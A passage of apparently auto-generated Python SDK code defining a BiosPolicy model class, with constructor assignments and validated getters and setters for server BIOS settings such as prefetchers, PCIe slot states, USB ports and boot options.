if cbs_cmn_cpu_l1stream_hw_prefetcher is not None:
self.cbs_cmn_cpu_l1stream_hw_prefetcher = cbs_cmn_cpu_l1stream_hw_prefetcher
if cbs_cmn_cpu_l2stream_hw_prefetcher is not None:
self.cbs_cmn_cpu_l2stream_hw_prefetcher = cbs_cmn_cpu_l2stream_hw_prefetcher
if cbs_cmn_determinism_slider is not None:
self.cbs_cmn_determinism_slider = cbs_cmn_determinism_slider
if cbs_cmn_gnb_nb_iommu is not None:
self.cbs_cmn_gnb_nb_iommu = cbs_cmn_gnb_nb_iommu
if cbs_cmn_mem_ctrl_bank_group_swap_ddr4 is not None:
self.cbs_cmn_mem_ctrl_bank_group_swap_ddr4 = cbs_cmn_mem_ctrl_bank_group_swap_ddr4
if cbs_cmn_mem_map_bank_interleave_ddr4 is not None:
self.cbs_cmn_mem_map_bank_interleave_ddr4 = cbs_cmn_mem_map_bank_interleave_ddr4
if cbs_cmnc_tdp_ctl is not None:
self.cbs_cmnc_tdp_ctl = cbs_cmnc_tdp_ctl
if cbs_df_cmn_mem_intlv is not None:
self.cbs_df_cmn_mem_intlv = cbs_df_cmn_mem_intlv
if cbs_df_cmn_mem_intlv_size is not None:
self.cbs_df_cmn_mem_intlv_size = cbs_df_cmn_mem_intlv_size
if cdn_enable is not None:
self.cdn_enable = cdn_enable
if cdn_support is not None:
self.cdn_support = cdn_support
if channel_inter_leave is not None:
self.channel_inter_leave = channel_inter_leave
if cke_low_policy is not None:
self.cke_low_policy = cke_low_policy
if closed_loop_therm_throtl is not None:
self.closed_loop_therm_throtl = closed_loop_therm_throtl
if cmci_enable is not None:
self.cmci_enable = cmci_enable
if config_tdp is not None:
self.config_tdp = config_tdp
if console_redirection is not None:
self.console_redirection = console_redirection
if core_multi_processing is not None:
self.core_multi_processing = core_multi_processing
if cpu_energy_performance is not None:
self.cpu_energy_performance = cpu_energy_performance
if cpu_frequency_floor is not None:
self.cpu_frequency_floor = cpu_frequency_floor
if cpu_performance is not None:
self.cpu_performance = cpu_performance
if cpu_power_management is not None:
self.cpu_power_management = cpu_power_management
if demand_scrub is not None:
self.demand_scrub = demand_scrub
if direct_cache_access is not None:
self.direct_cache_access = direct_cache_access
if dram_clock_throttling is not None:
self.dram_clock_throttling = dram_clock_throttling
if dram_refresh_rate is not None:
self.dram_refresh_rate = dram_refresh_rate
if energy_efficient_turbo is not None:
self.energy_efficient_turbo = energy_efficient_turbo
if eng_perf_tuning is not None:
self.eng_perf_tuning = eng_perf_tuning
if enhanced_intel_speed_step_tech is not None:
self.enhanced_intel_speed_step_tech = enhanced_intel_speed_step_tech
if epp_profile is not None:
self.epp_profile = epp_profile
if execute_disable_bit is not None:
self.execute_disable_bit = execute_disable_bit
if extended_apic is not None:
self.extended_apic = extended_apic
if flow_control is not None:
self.flow_control = flow_control
if frb2enable is not None:
self.frb2enable = frb2enable
if hardware_prefetch is not None:
self.hardware_prefetch = hardware_prefetch
if hwpm_enable is not None:
self.hwpm_enable = hwpm_enable
if imc_interleave is not None:
self.imc_interleave = imc_interleave
if intel_hyper_threading_tech is not None:
self.intel_hyper_threading_tech = intel_hyper_threading_tech
if intel_turbo_boost_tech is not None:
self.intel_turbo_boost_tech = intel_turbo_boost_tech
if intel_virtualization_technology is not None:
self.intel_virtualization_technology = intel_virtualization_technology
if intel_vt_for_directed_io is not None:
self.intel_vt_for_directed_io = intel_vt_for_directed_io
if intel_vtd_coherency_support is not None:
self.intel_vtd_coherency_support = intel_vtd_coherency_support
if intel_vtd_interrupt_remapping is not None:
self.intel_vtd_interrupt_remapping = intel_vtd_interrupt_remapping
if intel_vtd_pass_through_dma_support is not None:
self.intel_vtd_pass_through_dma_support = intel_vtd_pass_through_dma_support
if intel_vtdats_support is not None:
self.intel_vtdats_support = intel_vtdats_support
if ioh_error_enable is not None:
self.ioh_error_enable = ioh_error_enable
if ioh_resource is not None:
self.ioh_resource = ioh_resource
if ip_prefetch is not None:
self.ip_prefetch = ip_prefetch
if ipv6pxe is not None:
self.ipv6pxe = ipv6pxe
if kti_prefetch is not None:
self.kti_prefetch = kti_prefetch
if legacy_os_redirection is not None:
self.legacy_os_redirection = legacy_os_redirection
if legacy_usb_support is not None:
self.legacy_usb_support = legacy_usb_support
if llc_prefetch is not None:
self.llc_prefetch = llc_prefetch
if lom_port0state is not None:
self.lom_port0state = lom_port0state
if lom_port1state is not None:
self.lom_port1state = lom_port1state
if lom_port2state is not None:
self.lom_port2state = lom_port2state
if lom_port3state is not None:
self.lom_port3state = lom_port3state
if lom_ports_all_state is not None:
self.lom_ports_all_state = lom_ports_all_state
if lv_ddr_mode is not None:
self.lv_ddr_mode = lv_ddr_mode
if make_device_non_bootable is not None:
self.make_device_non_bootable = make_device_non_bootable
if memory_inter_leave is not None:
self.memory_inter_leave = memory_inter_leave
if memory_mapped_io_above4gb is not None:
self.memory_mapped_io_above4gb = memory_mapped_io_above4gb
if mirroring_mode is not None:
self.mirroring_mode = mirroring_mode
if mmcfg_base is not None:
self.mmcfg_base = mmcfg_base
if numa_optimized is not None:
self.numa_optimized = numa_optimized
if onboard10gbit_lom is not None:
self.onboard10gbit_lom = onboard10gbit_lom
if onboard_gbit_lom is not None:
self.onboard_gbit_lom = onboard_gbit_lom
if onboard_scu_storage_support is not None:
self.onboard_scu_storage_support = onboard_scu_storage_support
if onboard_scu_storage_sw_stack is not None:
self.onboard_scu_storage_sw_stack = onboard_scu_storage_sw_stack
if organization is not None:
self.organization = organization
if os_boot_watchdog_timer is not None:
self.os_boot_watchdog_timer = os_boot_watchdog_timer
if os_boot_watchdog_timer_policy is not None:
self.os_boot_watchdog_timer_policy = os_boot_watchdog_timer_policy
if os_boot_watchdog_timer_timeout is not None:
self.os_boot_watchdog_timer_timeout = os_boot_watchdog_timer_timeout
if out_of_band_mgmt_port is not None:
self.out_of_band_mgmt_port = out_of_band_mgmt_port
if package_cstate_limit is not None:
self.package_cstate_limit = package_cstate_limit
if patrol_scrub is not None:
self.patrol_scrub = patrol_scrub
if patrol_scrub_duration is not None:
self.patrol_scrub_duration = patrol_scrub_duration
if pc_ie_ssd_hot_plug_support is not None:
self.pc_ie_ssd_hot_plug_support = pc_ie_ssd_hot_plug_support
if pch_usb30mode is not None:
self.pch_usb30mode = pch_usb30mode
if pci_option_ro_ms is not None:
self.pci_option_ro_ms = pci_option_ro_ms
if pci_rom_clp is not None:
self.pci_rom_clp = pci_rom_clp
if pop_support is not None:
self.pop_support = pop_support
if post_error_pause is not None:
self.post_error_pause = post_error_pause
if processor_c1e is not None:
self.processor_c1e = processor_c1e
if processor_c3report is not None:
self.processor_c3report = processor_c3report
if processor_c6report is not None:
self.processor_c6report = processor_c6report
if processor_cstate is not None:
self.processor_cstate = processor_cstate
if profiles is not None:
self.profiles = profiles
if psata is not None:
self.psata = psata
if pstate_coord_type is not None:
self.pstate_coord_type = pstate_coord_type
if putty_key_pad is not None:
self.putty_key_pad = putty_key_pad
if pwr_perf_tuning is not None:
self.pwr_perf_tuning = pwr_perf_tuning
if qpi_link_frequency is not None:
self.qpi_link_frequency = qpi_link_frequency
if qpi_snoop_mode is not None:
self.qpi_snoop_mode = qpi_snoop_mode
if rank_inter_leave is not None:
self.rank_inter_leave = rank_inter_leave
if redirection_after_post is not None:
self.redirection_after_post = redirection_after_post
if sata_mode_select is not None:
self.sata_mode_select = sata_mode_select
if select_memory_ras_configuration is not None:
self.select_memory_ras_configuration = select_memory_ras_configuration
if serial_port_aenable is not None:
self.serial_port_aenable = serial_port_aenable
if single_pctl_enable is not None:
self.single_pctl_enable = single_pctl_enable
if slot10link_speed is not None:
self.slot10link_speed = slot10link_speed
if slot10state is not None:
self.slot10state = slot10state
if slot11link_speed is not None:
self.slot11link_speed = slot11link_speed
if slot11state is not None:
self.slot11state = slot11state
if slot12link_speed is not None:
self.slot12link_speed = slot12link_speed
if slot12state is not None:
self.slot12state = slot12state
if slot1link_speed is not None:
self.slot1link_speed = slot1link_speed
if slot1state is not None:
self.slot1state = slot1state
if slot2link_speed is not None:
self.slot2link_speed = slot2link_speed
if slot2state is not None:
self.slot2state = slot2state
if slot3link_speed is not None:
self.slot3link_speed = slot3link_speed
if slot3state is not None:
self.slot3state = slot3state
if slot4link_speed is not None:
self.slot4link_speed = slot4link_speed
if slot4state is not None:
self.slot4state = slot4state
if slot5link_speed is not None:
self.slot5link_speed = slot5link_speed
if slot5state is not None:
self.slot5state = slot5state
if slot6link_speed is not None:
self.slot6link_speed = slot6link_speed
if slot6state is not None:
self.slot6state = slot6state
if slot7link_speed is not None:
self.slot7link_speed = slot7link_speed
if slot7state is not None:
self.slot7state = slot7state
if slot8link_speed is not None:
self.slot8link_speed = slot8link_speed
if slot8state is not None:
self.slot8state = slot8state
if slot9link_speed is not None:
self.slot9link_speed = slot9link_speed
if slot9state is not None:
self.slot9state = slot9state
if slot_flom_link_speed is not None:
self.slot_flom_link_speed = slot_flom_link_speed
if slot_front_nvme1link_speed is not None:
self.slot_front_nvme1link_speed = slot_front_nvme1link_speed
if slot_front_nvme2link_speed is not None:
self.slot_front_nvme2link_speed = slot_front_nvme2link_speed
if slot_front_slot5link_speed is not None:
self.slot_front_slot5link_speed = slot_front_slot5link_speed
if slot_front_slot6link_speed is not None:
self.slot_front_slot6link_speed = slot_front_slot6link_speed
if slot_hba_link_speed is not None:
self.slot_hba_link_speed = slot_hba_link_speed
if slot_hba_state is not None:
self.slot_hba_state = slot_hba_state
if slot_lom1link is not None:
self.slot_lom1link = slot_lom1link
if slot_lom2link is not None:
self.slot_lom2link = slot_lom2link
if slot_mezz_state is not None:
self.slot_mezz_state = slot_mezz_state
if slot_mlom_link_speed is not None:
self.slot_mlom_link_speed = slot_mlom_link_speed
if slot_mlom_state is not None:
self.slot_mlom_state = slot_mlom_state
if slot_mraid_link_speed is not None:
self.slot_mraid_link_speed = slot_mraid_link_speed
if slot_mraid_state is not None:
self.slot_mraid_state = slot_mraid_state
if slot_n10state is not None:
self.slot_n10state = slot_n10state
if slot_n11state is not None:
self.slot_n11state = slot_n11state
if slot_n12state is not None:
self.slot_n12state = slot_n12state
if slot_n13state is not None:
self.slot_n13state = slot_n13state
if slot_n14state is not None:
self.slot_n14state = slot_n14state
if slot_n15state is not None:
self.slot_n15state = slot_n15state
if slot_n16state is not None:
self.slot_n16state = slot_n16state
if slot_n17state is not None:
self.slot_n17state = slot_n17state
if slot_n18state is not None:
self.slot_n18state = slot_n18state
if slot_n19state is not None:
self.slot_n19state = slot_n19state
if slot_n1state is not None:
self.slot_n1state = slot_n1state
if slot_n20state is not None:
self.slot_n20state = slot_n20state
if slot_n21state is not None:
self.slot_n21state = slot_n21state
if slot_n22state is not None:
self.slot_n22state = slot_n22state
if slot_n23state is not None:
self.slot_n23state = slot_n23state
if slot_n24state is not None:
self.slot_n24state = slot_n24state
if slot_n2state is not None:
self.slot_n2state = slot_n2state
if slot_n3state is not None:
self.slot_n3state = slot_n3state
if slot_n4state is not None:
self.slot_n4state = slot_n4state
if slot_n5state is not None:
self.slot_n5state = slot_n5state
if slot_n6state is not None:
self.slot_n6state = slot_n6state
if slot_n7state is not None:
self.slot_n7state = slot_n7state
if slot_n8state is not None:
self.slot_n8state = slot_n8state
if slot_n9state is not None:
self.slot_n9state = slot_n9state
if slot_raid_link_speed is not None:
self.slot_raid_link_speed = slot_raid_link_speed
if slot_raid_state is not None:
self.slot_raid_state = slot_raid_state
if slot_rear_nvme1link_speed is not None:
self.slot_rear_nvme1link_speed = slot_rear_nvme1link_speed
if slot_rear_nvme1state is not None:
self.slot_rear_nvme1state = slot_rear_nvme1state
if slot_rear_nvme2link_speed is not None:
self.slot_rear_nvme2link_speed = slot_rear_nvme2link_speed
if slot_rear_nvme2state is not None:
self.slot_rear_nvme2state = slot_rear_nvme2state
if slot_rear_nvme3state is not None:
self.slot_rear_nvme3state = slot_rear_nvme3state
if slot_rear_nvme4state is not None:
self.slot_rear_nvme4state = slot_rear_nvme4state
if slot_rear_nvme5state is not None:
self.slot_rear_nvme5state = slot_rear_nvme5state
if slot_rear_nvme6state is not None:
self.slot_rear_nvme6state = slot_rear_nvme6state
if slot_rear_nvme7state is not None:
self.slot_rear_nvme7state = slot_rear_nvme7state
if slot_rear_nvme8state is not None:
self.slot_rear_nvme8state = slot_rear_nvme8state
if slot_riser1link_speed is not None:
self.slot_riser1link_speed = slot_riser1link_speed
if slot_riser1slot1link_speed is not None:
self.slot_riser1slot1link_speed = slot_riser1slot1link_speed
if slot_riser1slot2link_speed is not None:
self.slot_riser1slot2link_speed = slot_riser1slot2link_speed
if slot_riser1slot3link_speed is not None:
self.slot_riser1slot3link_speed = slot_riser1slot3link_speed
if slot_riser2link_speed is not None:
self.slot_riser2link_speed = slot_riser2link_speed
if slot_riser2slot4link_speed is not None:
self.slot_riser2slot4link_speed = slot_riser2slot4link_speed
if slot_riser2slot5link_speed is not None:
self.slot_riser2slot5link_speed = slot_riser2slot5link_speed
if slot_riser2slot6link_speed is not None:
self.slot_riser2slot6link_speed = slot_riser2slot6link_speed
if slot_sas_state is not None:
self.slot_sas_state = slot_sas_state
if slot_ssd_slot1link_speed is not None:
self.slot_ssd_slot1link_speed = slot_ssd_slot1link_speed
if slot_ssd_slot2link_speed is not None:
self.slot_ssd_slot2link_speed = slot_ssd_slot2link_speed
if smee is not None:
self.smee = smee
if smt_mode is not None:
self.smt_mode = smt_mode
if snc is not None:
self.snc = snc
if sparing_mode is not None:
self.sparing_mode = sparing_mode
if sr_iov is not None:
self.sr_iov = sr_iov
if streamer_prefetch is not None:
self.streamer_prefetch = streamer_prefetch
if svm_mode is not None:
self.svm_mode = svm_mode
if terminal_type is not None:
self.terminal_type = terminal_type
if tpm_control is not None:
self.tpm_control = tpm_control
if tpm_support is not None:
self.tpm_support = tpm_support
if txt_support is not None:
self.txt_support = txt_support
if ucsm_boot_order_rule is not None:
self.ucsm_boot_order_rule = ucsm_boot_order_rule
if usb_emul6064 is not None:
self.usb_emul6064 = usb_emul6064
if usb_port_front is not None:
self.usb_port_front = usb_port_front
if usb_port_internal is not None:
self.usb_port_internal = usb_port_internal
if usb_port_kvm is not None:
self.usb_port_kvm = usb_port_kvm
if usb_port_rear is not None:
self.usb_port_rear = usb_port_rear
if usb_port_sd_card is not None:
self.usb_port_sd_card = usb_port_sd_card
if usb_port_vmedia is not None:
self.usb_port_vmedia = usb_port_vmedia
if usb_xhci_support is not None:
self.usb_xhci_support = usb_xhci_support
if vga_priority is not None:
self.vga_priority = vga_priority
if vmd_enable is not None:
self.vmd_enable = vmd_enable
if work_load_config is not None:
self.work_load_config = work_load_config
if xpt_prefetch is not None:
self.xpt_prefetch = xpt_prefetch
@property
def account_moid(self):
"""
Gets the account_moid of this BiosPolicy.
The Account ID for this managed object.
:return: The account_moid of this BiosPolicy.
:rtype: str
"""
return self._account_moid
@account_moid.setter
def account_moid(self, account_moid):
"""
Sets the account_moid of this BiosPolicy.
The Account ID for this managed object.
:param account_moid: The account_moid of this BiosPolicy.
:type: str
"""
self._account_moid = account_moid
@property
def ancestors(self):
"""
Gets the ancestors of this BiosPolicy.
Ancestors is an array containing the MO references of the ancestors in the object containment hierarchy.
:return: The ancestors of this BiosPolicy.
:rtype: list[MoBaseMoRef]
"""
return self._ancestors
@ancestors.setter
def ancestors(self, ancestors):
"""
Sets the ancestors of this BiosPolicy.
Ancestors is an array containing the MO references of the ancestors in the object containment hierarchy.
:param ancestors: The ancestors of this BiosPolicy.
:type: list[MoBaseMoRef]
"""
self._ancestors = ancestors
@property
def create_time(self):
"""
Gets the create_time of this BiosPolicy.
The time when this managed object was created.
:return: The create_time of this BiosPolicy.
:rtype: datetime
"""
return self._create_time
@create_time.setter
def create_time(self, create_time):
"""
Sets the create_time of this BiosPolicy.
The time when this managed object was created.
:param create_time: The create_time of this BiosPolicy.
:type: datetime
"""
self._create_time = create_time
@property
def mod_time(self):
"""
Gets the mod_time of this BiosPolicy.
The time when this managed object was last modified.
:return: The mod_time of this BiosPolicy.
:rtype: datetime
"""
return self._mod_time
@mod_time.setter
def mod_time(self, mod_time):
"""
Sets the mod_time of this BiosPolicy.
The time when this managed object was last modified.
:param mod_time: The mod_time of this BiosPolicy.
:type: datetime
"""
self._mod_time = mod_time
@property
def moid(self):
"""
Gets the moid of this BiosPolicy.
A unique identifier of this Managed Object instance.
:return: The moid of this BiosPolicy.
:rtype: str
"""
return self._moid
@moid.setter
def moid(self, moid):
"""
Sets the moid of this BiosPolicy.
A unique identifier of this Managed Object instance.
:param moid: The moid of this BiosPolicy.
:type: str
"""
self._moid = moid
@property
def object_type(self):
"""
Gets the object_type of this BiosPolicy.
The fully-qualified type of this managed object, e.g. the class name.
:return: The object_type of this BiosPolicy.
:rtype: str
"""
return self._object_type
@object_type.setter
def object_type(self, object_type):
"""
Sets the object_type of this BiosPolicy.
The fully-qualified type of this managed object, e.g. the class name.
:param object_type: The object_type of this BiosPolicy.
:type: str
"""
self._object_type = object_type
@property
def owners(self):
"""
Gets the owners of this BiosPolicy.
An array of owners which represent effective ownership of this object.
:return: The owners of this BiosPolicy.
:rtype: list[str]
"""
return self._owners
@owners.setter
def owners(self, owners):
"""
Sets the owners of this BiosPolicy.
An array of owners which represent effective ownership of this object.
:param owners: The owners of this BiosPolicy.
:type: list[str]
"""
self._owners = owners
@property
def parent(self):
"""
Gets the parent of this BiosPolicy.
The direct ancestor of this managed object in the containment hierarchy.
:return: The parent of this BiosPolicy.
:rtype: MoBaseMoRef
"""
return self._parent
@parent.setter
def parent(self, parent):
"""
Sets the parent of this BiosPolicy.
The direct ancestor of this managed object in the containment hierarchy.
:param parent: The parent of this BiosPolicy.
:type: MoBaseMoRef
"""
self._parent = parent
@property
def tags(self):
"""
Gets the tags of this BiosPolicy.
An array of tags, which allow to add key, value meta-data to managed objects.
:return: The tags of this BiosPolicy.
:rtype: list[MoTag]
"""
return self._tags
@tags.setter
def tags(self, tags):
"""
Sets the tags of this BiosPolicy.
An array of tags, which allow to add key, value meta-data to managed objects.
:param tags: The tags of this BiosPolicy.
:type: list[MoTag]
"""
self._tags = tags
@property
def version_context(self):
"""
Gets the version_context of this BiosPolicy.
The versioning info for this managed object
:return: The version_context of this BiosPolicy.
:rtype: MoVersionContext
"""
return self._version_context
@version_context.setter
def version_context(self, version_context):
"""
Sets the version_context of this BiosPolicy.
The versioning info for this managed object
:param version_context: The version_context of this BiosPolicy.
:type: MoVersionContext
"""
self._version_context = version_context
@property
def description(self):
"""
Gets the description of this BiosPolicy.
Description of the policy.
:return: The description of this BiosPolicy.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this BiosPolicy.
Description of the policy.
:param description: The description of this BiosPolicy.
:type: str
"""
self._description = description
@property
def name(self):
"""
Gets the name of this BiosPolicy.
Name of the policy.
:return: The name of this BiosPolicy.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this BiosPolicy.
Name of the policy.
:param name: The name of this BiosPolicy.
:type: str
"""
self._name = name
@property
def adjacent_cache_line_prefetch(self):
"""
Gets the adjacent_cache_line_prefetch of this BiosPolicy.
BIOS Token for setting Adjacent Cache Line Prefetcher configuration
:return: The adjacent_cache_line_prefetch of this BiosPolicy.
:rtype: str
"""
return self._adjacent_cache_line_prefetch
@adjacent_cache_line_prefetch.setter
def adjacent_cache_line_prefetch(self, adjacent_cache_line_prefetch):
"""
Sets the adjacent_cache_line_prefetch of this BiosPolicy.
BIOS Token for setting Adjacent Cache Line Prefetcher configuration
:param adjacent_cache_line_prefetch: The adjacent_cache_line_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if adjacent_cache_line_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `adjacent_cache_line_prefetch` ({0}), must be one of {1}"
.format(adjacent_cache_line_prefetch, allowed_values)
)
self._adjacent_cache_line_prefetch = adjacent_cache_line_prefetch
@property
def all_usb_devices(self):
"""
Gets the all_usb_devices of this BiosPolicy.
BIOS Token for setting All USB Devices configuration
:return: The all_usb_devices of this BiosPolicy.
:rtype: str
"""
return self._all_usb_devices
@all_usb_devices.setter
def all_usb_devices(self, all_usb_devices):
"""
Sets the all_usb_devices of this BiosPolicy.
BIOS Token for setting All USB Devices configuration
:param all_usb_devices: The all_usb_devices of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if all_usb_devices not in allowed_values:
raise ValueError(
"Invalid value for `all_usb_devices` ({0}), must be one of {1}"
.format(all_usb_devices, allowed_values)
)
self._all_usb_devices = all_usb_devices
@property
def altitude(self):
"""
Gets the altitude of this BiosPolicy.
BIOS Token for setting Altitude configuration
:return: The altitude of this BiosPolicy.
:rtype: str
"""
return self._altitude
@altitude.setter
def altitude(self, altitude):
"""
Sets the altitude of this BiosPolicy.
BIOS Token for setting Altitude configuration
:param altitude: The altitude of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1500-m", "300-m", "3000-m", "900-m", "auto"]
if altitude not in allowed_values:
raise ValueError(
"Invalid value for `altitude` ({0}), must be one of {1}"
.format(altitude, allowed_values)
)
self._altitude = altitude
@property
def aspm_support(self):
"""
Gets the aspm_support of this BiosPolicy.
BIOS Token for setting ASPM Support configuration
:return: The aspm_support of this BiosPolicy.
:rtype: str
"""
return self._aspm_support
@aspm_support.setter
def aspm_support(self, aspm_support):
"""
Sets the aspm_support of this BiosPolicy.
BIOS Token for setting ASPM Support configuration
:param aspm_support: The aspm_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "Disabled", "Force L0s", "L1 Only"]
if aspm_support not in allowed_values:
raise ValueError(
"Invalid value for `aspm_support` ({0}), must be one of {1}"
.format(aspm_support, allowed_values)
)
self._aspm_support = aspm_support
@property
def assert_nmi_on_perr(self):
"""
Gets the assert_nmi_on_perr of this BiosPolicy.
BIOS Token for setting Assert NMI on PERR configuration
:return: The assert_nmi_on_perr of this BiosPolicy.
:rtype: str
"""
return self._assert_nmi_on_perr
@assert_nmi_on_perr.setter
def assert_nmi_on_perr(self, assert_nmi_on_perr):
"""
Sets the assert_nmi_on_perr of this BiosPolicy.
BIOS Token for setting Assert NMI on PERR configuration
:param assert_nmi_on_perr: The assert_nmi_on_perr of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if assert_nmi_on_perr not in allowed_values:
raise ValueError(
"Invalid value for `assert_nmi_on_perr` ({0}), must be one of {1}"
.format(assert_nmi_on_perr, allowed_values)
)
self._assert_nmi_on_perr = assert_nmi_on_perr
@property
def assert_nmi_on_serr(self):
"""
Gets the assert_nmi_on_serr of this BiosPolicy.
BIOS Token for setting Assert NMI on SERR configuration
:return: The assert_nmi_on_serr of this BiosPolicy.
:rtype: str
"""
return self._assert_nmi_on_serr
@assert_nmi_on_serr.setter
def assert_nmi_on_serr(self, assert_nmi_on_serr):
"""
Sets the assert_nmi_on_serr of this BiosPolicy.
BIOS Token for setting Assert NMI on SERR configuration
:param assert_nmi_on_serr: The assert_nmi_on_serr of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if assert_nmi_on_serr not in allowed_values:
raise ValueError(
"Invalid value for `assert_nmi_on_serr` ({0}), must be one of {1}"
.format(assert_nmi_on_serr, allowed_values)
)
self._assert_nmi_on_serr = assert_nmi_on_serr
@property
def auto_cc_state(self):
"""
Gets the auto_cc_state of this BiosPolicy.
BIOS Token for setting Autonomous Core C-state configuration
:return: The auto_cc_state of this BiosPolicy.
:rtype: str
"""
return self._auto_cc_state
@auto_cc_state.setter
def auto_cc_state(self, auto_cc_state):
"""
Sets the auto_cc_state of this BiosPolicy.
BIOS Token for setting Autonomous Core C-state configuration
:param auto_cc_state: The auto_cc_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if auto_cc_state not in allowed_values:
raise ValueError(
"Invalid value for `auto_cc_state` ({0}), must be one of {1}"
.format(auto_cc_state, allowed_values)
)
self._auto_cc_state = auto_cc_state
@property
def autonumous_cstate_enable(self):
"""
Gets the autonumous_cstate_enable of this BiosPolicy.
BIOS Token for setting CPU Autonomous Cstate configuration
:return: The autonumous_cstate_enable of this BiosPolicy.
:rtype: str
"""
return self._autonumous_cstate_enable
@autonumous_cstate_enable.setter
def autonumous_cstate_enable(self, autonumous_cstate_enable):
"""
Sets the autonumous_cstate_enable of this BiosPolicy.
BIOS Token for setting CPU Autonomous Cstate configuration
:param autonumous_cstate_enable: The autonumous_cstate_enable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if autonumous_cstate_enable not in allowed_values:
raise ValueError(
"Invalid value for `autonumous_cstate_enable` ({0}), must be one of {1}"
.format(autonumous_cstate_enable, allowed_values)
)
self._autonumous_cstate_enable = autonumous_cstate_enable
@property
def baud_rate(self):
"""
Gets the baud_rate of this BiosPolicy.
BIOS Token for setting Baud rate configuration
:return: The baud_rate of this BiosPolicy.
:rtype: str
"""
return self._baud_rate
@baud_rate.setter
def baud_rate(self, baud_rate):
"""
Sets the baud_rate of this BiosPolicy.
BIOS Token for setting Baud rate configuration
:param baud_rate: The baud_rate of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "115200", "19200", "38400", "57600", "9600"]
if baud_rate not in allowed_values:
raise ValueError(
"Invalid value for `baud_rate` ({0}), must be one of {1}"
.format(baud_rate, allowed_values)
)
self._baud_rate = baud_rate
@property
def bme_dma_mitigation(self):
"""
Gets the bme_dma_mitigation of this BiosPolicy.
BIOS Token for setting BME DMA Mitigation configuration
:return: The bme_dma_mitigation of this BiosPolicy.
:rtype: str
"""
return self._bme_dma_mitigation
@bme_dma_mitigation.setter
def bme_dma_mitigation(self, bme_dma_mitigation):
"""
Sets the bme_dma_mitigation of this BiosPolicy.
BIOS Token for setting BME DMA Mitigation configuration
:param bme_dma_mitigation: The bme_dma_mitigation of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if bme_dma_mitigation not in allowed_values:
raise ValueError(
"Invalid value for `bme_dma_mitigation` ({0}), must be one of {1}"
.format(bme_dma_mitigation, allowed_values)
)
self._bme_dma_mitigation = bme_dma_mitigation
@property
def boot_option_num_retry(self):
"""
Gets the boot_option_num_retry of this BiosPolicy.
BIOS Token for setting Number of Retries configuration
:return: The boot_option_num_retry of this BiosPolicy.
:rtype: str
"""
return self._boot_option_num_retry
@boot_option_num_retry.setter
def boot_option_num_retry(self, boot_option_num_retry):
"""
Sets the boot_option_num_retry of this BiosPolicy.
BIOS Token for setting Number of Retries configuration
:param boot_option_num_retry: The boot_option_num_retry of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "13", "5", "Infinite"]
if boot_option_num_retry not in allowed_values:
raise ValueError(
"Invalid value for `boot_option_num_retry` ({0}), must be one of {1}"
.format(boot_option_num_retry, allowed_values)
)
self._boot_option_num_retry = boot_option_num_retry
@property
def boot_option_re_cool_down(self):
"""
Gets the boot_option_re_cool_down of this BiosPolicy.
BIOS Token for setting Cool Down Time (sec) configuration
:return: The boot_option_re_cool_down of this BiosPolicy.
:rtype: str
"""
return self._boot_option_re_cool_down
@boot_option_re_cool_down.setter
def boot_option_re_cool_down(self, boot_option_re_cool_down):
"""
Sets the boot_option_re_cool_down of this BiosPolicy.
BIOS Token for setting Cool Down Time (sec) configuration
:param boot_option_re_cool_down: The boot_option_re_cool_down of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "15", "45", "90"]
if boot_option_re_cool_down not in allowed_values:
raise ValueError(
"Invalid value for `boot_option_re_cool_down` ({0}), must be one of {1}"
.format(boot_option_re_cool_down, allowed_values)
)
self._boot_option_re_cool_down = boot_option_re_cool_down
@property
def boot_option_retry(self):
"""
Gets the boot_option_retry of this BiosPolicy.
BIOS Token for setting Boot option retry configuration
:return: The boot_option_retry of this BiosPolicy.
:rtype: str
"""
return self._boot_option_retry
@boot_option_retry.setter
def boot_option_retry(self, boot_option_retry):
"""
Sets the boot_option_retry of this BiosPolicy.
BIOS Token for setting Boot option retry configuration
:param boot_option_retry: The boot_option_retry of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if boot_option_retry not in allowed_values:
raise ValueError(
"Invalid value for `boot_option_retry` ({0}), must be one of {1}"
.format(boot_option_retry, allowed_values)
)
self._boot_option_retry = boot_option_retry
@property
def boot_performance_mode(self):
"""
Gets the boot_performance_mode of this BiosPolicy.
BIOS Token for setting Boot Performance Mode configuration
:return: The boot_performance_mode of this BiosPolicy.
:rtype: str
"""
return self._boot_performance_mode
@boot_performance_mode.setter
def boot_performance_mode(self, boot_performance_mode):
"""
Sets the boot_performance_mode of this BiosPolicy.
BIOS Token for setting Boot Performance Mode configuration
:param boot_performance_mode: The boot_performance_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Max Efficient", "Max Performance", "Set by Intel NM"]
if boot_performance_mode not in allowed_values:
raise ValueError(
"Invalid value for `boot_performance_mode` ({0}), must be one of {1}"
.format(boot_performance_mode, allowed_values)
)
self._boot_performance_mode = boot_performance_mode
@property
def cbs_cmn_cpu_cpb(self):
"""
Gets the cbs_cmn_cpu_cpb of this BiosPolicy.
BIOS Token for setting Core Performance Boost configuration
:return: The cbs_cmn_cpu_cpb of this BiosPolicy.
:rtype: str
"""
return self._cbs_cmn_cpu_cpb
@cbs_cmn_cpu_cpb.setter
def cbs_cmn_cpu_cpb(self, cbs_cmn_cpu_cpb):
"""
Sets the cbs_cmn_cpu_cpb of this BiosPolicy.
BIOS Token for setting Core Performance Boost configuration
:param cbs_cmn_cpu_cpb: The cbs_cmn_cpu_cpb of this BiosPolicy.
:type: str
"""
